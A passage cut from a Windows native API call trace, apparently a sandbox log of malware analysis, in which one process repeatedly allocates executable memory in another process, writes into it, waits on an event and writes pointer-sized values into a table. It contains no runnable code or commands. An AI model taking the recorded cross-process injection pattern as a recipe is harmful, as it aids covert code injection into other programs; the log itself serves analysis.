AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.929] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949eac*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949eac*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.929] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.929] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.930] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.930] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.930] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.930] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.930] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.930] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.930] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.931] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.931] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.931] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.931] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a210, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.931] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.931] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e0e*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e0e*, NumberOfBytesWritten=0x28df88*=0x17) returned 0x0 [0140.931] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.931] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.932] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.932] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.932] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.932] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.932] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.932] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.932] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.932] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.933] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20027, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.933] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.933] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a218, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.933] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.933] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e28*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e28*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.933] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.933] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.933] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.934] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.934] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.934] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.934] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.934] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.934] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.934] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.934] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.935] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.935] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a220, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.935] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.935] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e3e*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e3e*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.935] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.935] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.935] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.936] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.936] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.936] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.936] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.936] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.936] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.936] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.936] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.936] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.937] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a228, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.937] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.937] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e52*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e52*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.937] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.937] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.937] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.937] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.938] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.938] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.938] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.938] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.938] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.938] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.938] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.938] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.938] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a230, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.939] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.939] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e68*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e68*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.939] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.939] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.939] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.939] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.939] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.940] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.940] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.940] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.940] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.940] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.940] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.940] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.940] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a238, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.941] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.941] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949de6*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949de6*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.941] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.942] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.942] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.942] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.942] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.942] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.942] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.942] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.942] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.943] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.943] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.943] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.943] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a240, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.943] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.943] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e7e*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e7e*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0140.943] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.943] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.944] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.944] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.944] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.944] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.944] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.944] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.944] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.944] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.945] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.945] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.945] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a248, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.945] NtAllocateVirtualMemory (in: ProcessHandle=0x138, 